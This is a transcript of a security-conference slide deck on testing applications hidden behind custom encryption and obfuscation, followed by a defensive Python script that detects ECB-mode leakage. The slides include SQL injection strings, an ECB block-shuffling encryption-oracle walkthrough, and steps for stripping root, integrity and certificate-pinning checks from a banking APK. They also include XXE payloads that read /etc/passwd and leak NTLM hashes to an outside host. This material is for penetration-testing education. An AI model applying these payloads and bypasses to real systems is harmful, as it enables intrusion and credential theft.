
We need to go deeper - Testing inception apps.

362 views

Published on

When it comes to thick clients, Java applets, embedded devices or mobile apps, the idea is often to forget about the HTTP/S stack and plaintext POST parameters and instead implement a custom communication protocol:
  • Sending files for printing? Caesar cipher does not support full UTF-8, so use AES in ECB mode.
  • Malware attacking online banking? Even over HTTPS, double-encrypt POST parameters. If your clients are rich, use asymmetric encryption, for better protection.
  • Planning SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection.
Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography: ideas that usually implement 'security by obscurity'. Once the outer layer of obfuscation is off, the server backend very often reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from enterprise solution tests which required a bit more effort to allow tampering with data sent from the client:
  • intercepting the traffic, bypassing NAC
  • decapsulating encryption and encoding layers
  • hooking into function calls, modifying packages
  • reverse-engineering proprietary protocols and encryption.

Published in: Software

We need to go deeper - Testing inception apps.

  1. We need to go deeper – Testing inception apps. Jakub Kaluzny, CONFidence, June 2019
  2. DevSecOps: HTTP username=admin&password=abc vs. B64 dXNlcm5hbWUK=YWRtaW4K&cGFzc3dvcmQK=YWJjCg%3d%3d; DAST scanner in CI/CD pipeline; SQLi – is it fixed? Base64_decode(„YWJjCg==’ OR 1=1”)
  3. Who: Jakub Kaluzny • 10 years in IT & Security • Threat modeling, DevSecOps, penetration tests • Poland, Spain, Australia • banking, fintech, law, airline, entertainment, e-commerce • Speaker at BlackHat, HackInTheBox, ZeroNights
  4. What is this all about? HTTP username=admin&password=abc → SSL → HTTP username=admin&password=abc; Wireshark
  5. Protection against what? Sniffing, Man-in-The-Middle vs. SQL Injection, cross-user access control, business logic
  6. What is this all about? HTTP dXNlcm5hbWUK=YWRtaW4K&cGFzc3dvcmQK=YWJjCg%3d%3d; HTTP username=admin&password=abc; SSL; local HTTP proxy; custom script; Wireshark
  7. Inception apps: AES encrypted: c6fa10bd98a6c4e778eac; binary protocol; SSL; key exchange during activation; mobile app – obfuscated; emulator and root/jailbreak detection
  8. Why? • Raising the bar: for attackers? for testers? • Money: scoping a test? • Risk: attack surface coverage? security level?
  9. What: • Technical examples • Business consequences • And discuss pentesting processes in general
  10. LET’S GET TO IT
  11. Example 1: Enterprise printers – Pull Printing (printer, workstation, print server) https://www.slideshare.net/wojdwo/hitb-kaluzny-final
  12. In the middle of printers
  13. Printers down under – AES
  14. Hidden gem – SD card: • JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key – AES
  15. Example 1 – decompiled JAR
  16. Example 1: • JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key – AES • It’s the same everywhere! • No remote firmware update!
  17. Attack flow (threat actor → crown jewels): sniff the communication; get the SD card; extract the key; apply decryption
  18. In the middle of printers – revisited. Server ↔ printer exchange: HELLO (constant, 263B); HELLO, CERTIFICATE (96B, “X” B, 128B); SESSION KEY (always different, 64B); PostScript, ECB mode (many identical 16B blocks)
  19. ECB encryption mode for PostScript files: each block encrypted separately; ECB is bad. https://en.wikipedia.org/wiki/ECB_mode
  20. In the middle of printers – revisited. Server ↔ printer exchange: HELLO (constant, 263B); HELLO, CERTIFICATE (96B, “X” B, 128B); SESSION KEY (always different, 64B); PostScript, ECB mode (many identical 16B blocks)
  21. Attack flow (threat actor → crown jewels): sniff the communication; communication analysis; decryption script; data extraction; access to plaintext files, no access control
  22. MORE
  23. Web app, AES comms, no key access: HTTP Action=buy&Product=137&name=Kaluzny → HTTP magic_string=abcdef1234567890… → HTTP magic_string=abcdef1234567890… → HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50
  24. Magic string – the request ciphertext split into 16-byte blocks:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 11b3215b7764e11fbff4c1db3aa73925
     • e479b31f1313d3c7bf78585f77f3f17d
     • c69bb9650a3bfb6e9137e218c7267da6
     • a57fcd28cc90574b00374cc42f224dd3
     magic_string=b0dc782f6bd9acce9bc3e9c8317b05125bb51d9cbc4bfa56d41d7db1489f9bbcc2cc45f774773e8adde9c41ecd62c5bc1faafa1d2553661c8b83012f7e968d511b3215b7764e11fbff4c1db3aa7325e479b31f1313d3c7bf78585f77f3f17dc69bb9650a3bfb6e9137e218c7267da6a57fcd28cc9074b00374cc42f224dd3
     magic_string=b0dc782f6bd9acce9bc3e9c8317bb6e9137e218c7267da6a57fcd28cc9074b00374cc42f224dd3’ OR 1=1
  25. Magic string, name=Kaluznyaaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 11b3215b7764e11fbff4c1db3aa73925
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • c69bb9650a3bfb6e9137e218c7267da6
     • a57fcd28cc90574b00374cc42f224dd3
     Response: Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
  26. Magic string, name=Kaluznyaaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
     • a57fcd28cc90574b00374cc42f224dd3
     Response: Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
  27. Magic string, name=Kaluznyaaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
     • a57fcd28cc90574b00374cc42f224dd3
     Response: Hi aaaaaaaaaaaaaa aKaluznyaaaaaa aaaaaaaaaaa, your price is 1500.50
  28. Magic string, name=Kaluznyaaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
     • a57fcd28cc90574b00374cc42f224dd3
  29. Magic string, name=aluznyaaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i”
     • a57fcd28cc90574b00374cc42f224dd3
  30. Magic string, name=luznyaaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip”
     • a57fcd28cc90574b00374cc42f224dd3
  31. Magic string, name=aaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A”
     • a57fcd28cc90574b00374cc42f224dd3
  32. Magic string, name=aaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • 1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user”
     • a57fcd28cc90574b00374cc42f224dd3
  33. Magic string, name=aaaaaaaaaaaaaaa…:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
     • a57fcd28cc90574b00374cc42f224dd3
  34. Encryption Oracle:
     • b0dc782f6bd9acce9bc3e9c8317b0512
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc
     • c2cc45f774773e48adde9c41ecd62c5b
     • c1faafa1d2553661c8b83012f7e968d5
     • 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
     • e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
     • c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
     Response: Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaX.Y.Z.A, your price is 1500.50
  35. Encryption Oracle:
     • B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item”
     • 5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500”
     • c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn”
     • c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us”
     • 179762d5bba72ce4700aad2a96f5121d „er=admin&passwo”
     • e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=”
     • 031531894944dd25e457746a02f7eacf „&arbitrary=asd&&”
     • 820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
  36. Web app, AES comms, no key access: HTTP Action=buy&Product=137&name=Kaluzny → HTTP magic_string=abcdef1234567890… → HTTP magic_string=abcdef1234567890… → HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50; API
  37. Attack flow (threat actor → crown jewels): tamper with parameters; communication analysis; encryption oracle; lateral movement. Credentials would never be sent unencrypted
  38. MITB MALWARE DETECTION IN JAVASCRIPT
  39. MiTB malware – WebInjects: <title>Bank</title> … Password: <input type=text> <script src=//malware> vs. <title>Bank</title> … Password: <input type=text>
  40. MiTB malware detection in JS: <script src=//antimalware> <script src=//malware> <title>Bank</title> …
  41. JS-based MiTB malware detection: MiTB malware detection in JavaScript; eval; obfuscation – base64, hex; RSA encryption; signatures; reasoning engine; Web Service; RSA public key. https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence @molejarka, @j_kaluzny
  42. Attack flow (threat actor → crown jewels): tamper with parameters; deobfuscate JS; extract RSA keys; decrypt communication
  43. MiTB malware detection in JS: <script src=//antimalware> <script src=//malware> <title>Bank</title> …
  44. TESTING MOBILE BANKING IN 2019
  45. Mobile banking in early 2010s: “Hi, I want to send $5” – “OK”; standard SSL
  46. Attack flow – Android – inception level 1 (threat actor → crown jewels): tamper with parameters; add local proxy CA
  47. Android – inception level 1: • Export CA from local proxy • Push it to the device • Intercept traffic
  48. Mobile banking in early 2010s: “Hi, I want to send $5” – “OK”; SSL pinning
  49. Attack flow – inception level 2. Modifying a hardcoded certificate: • Unpack APK • Change certificate in resources • Pack the app, sign it
  50. Attack flow – inception level 2 (threat actor → crown jewels): tamper with parameters; bypass hardcoded SSL pinning checks; set the proxy
  51. Attack flow – inception level 2: • Decompile APK to Smali code • „Void” the pinning methods or change the certificate: find the interesting methods; delete the code, leaving „return-void” at the end • Build it, sign it
  52. Testing mobile banking in late 2010s, Poland: “Hi, I want to pair a mobile app” – “OK, let’s set a key for future encryption”; 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436; SSL pinning; HTTP body encryption
  53. HTTP body encryption: HTTP payload=e47bf2dcd90af0d3366f4bacfe932ffae47bf2dcd90af0d33 inside SSL
  54. Testing mobile banking in late 2010s, Poland: “Hi, I want to pair a mobile app” – “OK, let’s set a key for future encryption”; 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436; SSL pinning; encrypted storage; APK/IPA integrity; emulator detection; root/jb detection; HTTP body encryption
  55. Attack flow – Android – 7 layers of inception (threat actor → crown jewels): tamper with parameters; bypass integrity checks; bypass root detection; make encryption static; bypass SSL pinning; bypass emulator detection; develop Burp plugin
  56. Attack flow – Android – inception level 1/7: • Decompile APK to Smali code • „Void” the integrity checks
  57. Attack flow – Android – inception level 2/7: • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • Second root check runs a minute after the first!
  58. Attack flow – Android – inception level 3/7: • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection
  59. Attack flow – Android – inception level 4/7: • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning
  60. Attack flow – Android – inception level 5/7: • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static”
  61. Example 4 – mobile banking in 2019, Poland: “Hi, I want to pair a mobile app” – “OK, let’s set a key for future encryption”; 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436; SSL pinning; encrypted storage; APK/IPA integrity; emulator detection; root/jb detection; HTTP body encryption
  62. Example 4 – mobile banking in 2019, Poland: “Hi, I want to pair a mobile app” – “The key will be 0000000000”; 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436; SSL pinning; encrypted storage; APK/IPA integrity; emulator detection; root/jb detection; HTTP body encryption
  63. Attack flow – Android – inception level 6/7: • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” • Develop a custom Burp plugin
  64. Burp plugin – „Deszyfrator” @slawekja
  65. Attack flow – Android – inception level 7/7 (threat actor → crown jewels): tamper with parameters; bypass integrity checks; bypass root detection; make encryption static; bypass SSL pinning; bypass emulator detection; develop Burp plugin. You are in position to start testing
  66. SOAP – Simple Object Access Protocol; WCF BINARY XML – SOAP; TCP; START-TLS. Let’s call it tnSOAP – totally not SOAP
  67. mitm_relay for START-TLS (https://github.com/jrmdev/mitm_relay):
     [thick client] ----▶ [mitm_relay] ----▶ [destination server]
                              |   ▲
                              ▼   |
                          [local proxy]      < Intercept and modify traffic here
                              |   ▲
                              ▼   |
                        [dummy webserver]
  68. WCF data – python-wcfbin by ERNW:
     [jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv
     <?xml version="1.0"?>
     <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org">
       <soap:Header>
       </soap:Header>
       <soap:Body>
         <m:GetStockPrice>
           <m:StockName>GOOG</m:StockName>
         </m:GetStockPrice>
       </soap:Body>
     </soap:Envelope>
     00000000  43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01  |C.soap...soap...|
     00000010  6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61  |m.http://www.exa|
     00000020  6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01  |mple.orgC.soap..|
     00000030  43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63  |C.soap.j.GetStoc|
     00000040  6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d  |kPricej.StockNam|
     00000050  65 9f 03 18 e3 86 01 01 01                       |e........|
     00000059
  69. Attack flow – tnSOAP (threat actor → crown jewels): tamper with parameters; intercept TCP connection (hardware + socat); MiTM on START-TLS (mitm_relay); decapsulate WCF (python-wcfbin + few fixes)
  70. • <!ENTITY xxe SYSTEM „file:///etc/passwd”> • XXE OOB over FTP • <!ENTITY „abc” SYSTEM „file://securing.biz:445/”> TCP → START TLS → WCF → XML → XXE → NTLM https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
  71. Attack flow – tnSOAP (threat actor → increased attack surface): tamper with parameters; intercept TCP connection (hardware + socat); MiTM on START-TLS (mitm_relay); decapsulate WCF (python-wcfbin + few fixes)
  72. Processes: • Not a surprise that there are vulnerabilities • Let’s talk about corporate processes: How are penetration tests organised? During which phase do you realise it’s an inception app? What is the cost of implementing inception? What is the security advantage of inception? What is the cost of testing an inception app? How to optimise it?
  73. Attack flow – Android – inception level 7/7 (threat actor → crown jewels): tamper with parameters; bypass integrity checks; bypass root detection; make encryption static; bypass SSL pinning; bypass emulator detection; develop Burp plugin. You are in position to start testing
  74. Summary: • Not a surprise that there are vulnerabilities • Let’s talk about corporate processes: How are penetration tests organised? During which phase do you realise it’s an inception app? What is the cost of implementing inception? What is the security advantage of inception? What is the cost of testing an inception app? How to optimise it?
  75. Protection against what? Sniffing, Man-in-The-Middle, Malware vs. SQL Injection, cross-user access control, business logic
  76. Summary: • Not a surprise that there are vulnerabilities • Let’s talk about corporate processes: How are penetration tests organised? During which phase do you realise it’s an inception app? What is the cost of implementing inception? What is the security advantage of inception? What is the cost of testing an inception app? How to optimise it?
  77. Thank you! Twitter: @j_kaluzny Jakub.Kaluzny@securing.biz MORE THAN SECURITY TESTS.
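The ECB leakage the deck walks through (slides 18 to 21 for the printers, 24 to 35 for the web app) can be checked for without knowing the key: identical plaintext blocks give identical ciphertext blocks, and an unchanged request prefix gives an unchanged ciphertext prefix. The detector below is an added example written for this page, not code from the talk; its sample input is constructed from the magic_string blocks read off slides 25 and 26, and a mode with a random IV or nonce (CBC, CTR, GCM) would show neither indicator.

```python
"""Spot ECB-mode leakage in captured ciphertext without the key."""
from collections import defaultdict

BLOCK = 16  # AES block size in bytes; ECB encrypts every block independently


def split_blocks(hex_ct: str) -> list[str]:
    """Split a hex-encoded ciphertext into 16-byte (32 hex character) blocks."""
    hex_ct = hex_ct.strip().lower()
    if len(hex_ct) % (2 * BLOCK):
        raise ValueError("ciphertext is not a whole number of 16-byte blocks")
    return [hex_ct[i:i + 2 * BLOCK] for i in range(0, len(hex_ct), 2 * BLOCK)]


def repeated_blocks(hex_ct: str) -> dict[str, list[int]]:
    """Map every ciphertext block that occurs more than once to its positions."""
    seen = defaultdict(list)
    for pos, blk in enumerate(split_blocks(hex_ct)):
        seen[blk].append(pos)
    return {blk: pos for blk, pos in seen.items() if len(pos) > 1}


def common_prefix_blocks(ct_a: str, ct_b: str) -> int:
    """Count the leading blocks two ciphertexts share (a constant prefix under ECB)."""
    n = 0
    for a, b in zip(split_blocks(ct_a), split_blocks(ct_b)):
        if a != b:
            break
        n += 1
    return n


def looks_like_ecb(hex_ct: str) -> bool:
    """Repeated blocks are a strong ECB signal; random-IV modes make them negligible."""
    return bool(repeated_blocks(hex_ct))


# Constructed sample input: the magic_string blocks read off slides 25 and 26
# (name padded with 'a' characters, the two requests differ by one character of alignment).
MAGIC_SLIDE_25 = (
    "b0dc782f6bd9acce9bc3e9c8317b0512" "5bb51d9cbc4bfa56d41d7db1489f9bbc"
    "c2cc45f774773e48adde9c41ecd62c5b" "c1faafa1d2553661c8b83012f7e968d5"
    "11b3215b7764e11fbff4c1db3aa73925" "e479b31f1313d3c7bf78585f77f3f17d"
    "e479b31f1313d3c7bf78585f77f3f17d" "c69bb9650a3bfb6e9137e218c7267da6"
    "a57fcd28cc90574b00374cc42f224dd3"
)
MAGIC_SLIDE_26 = (
    "b0dc782f6bd9acce9bc3e9c8317b0512" "5bb51d9cbc4bfa56d41d7db1489f9bbc"
    "c2cc45f774773e48adde9c41ecd62c5b" "c1faafa1d2553661c8b83012f7e968d5"
    "179762d5bba72ce4700aad2a96f5121d" "e479b31f1313d3c7bf78585f77f3f17d"
    "e479b31f1313d3c7bf78585f77f3f17d" "5e8c96910f00f0c13fd5a402877d01ec"
    "a57fcd28cc90574b00374cc42f224dd3"
)

if __name__ == "__main__":
    print("repeated blocks:", repeated_blocks(MAGIC_SLIDE_25))
    print("constant prefix blocks:", common_prefix_blocks(MAGIC_SLIDE_25, MAGIC_SLIDE_26))
    print("ECB suspected:", looks_like_ecb(MAGIC_SLIDE_25))
```

Run over a live capture, a positive result means the review finding is "ECB mode, plaintext structure leaks" before any decryption or oracle work starts.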
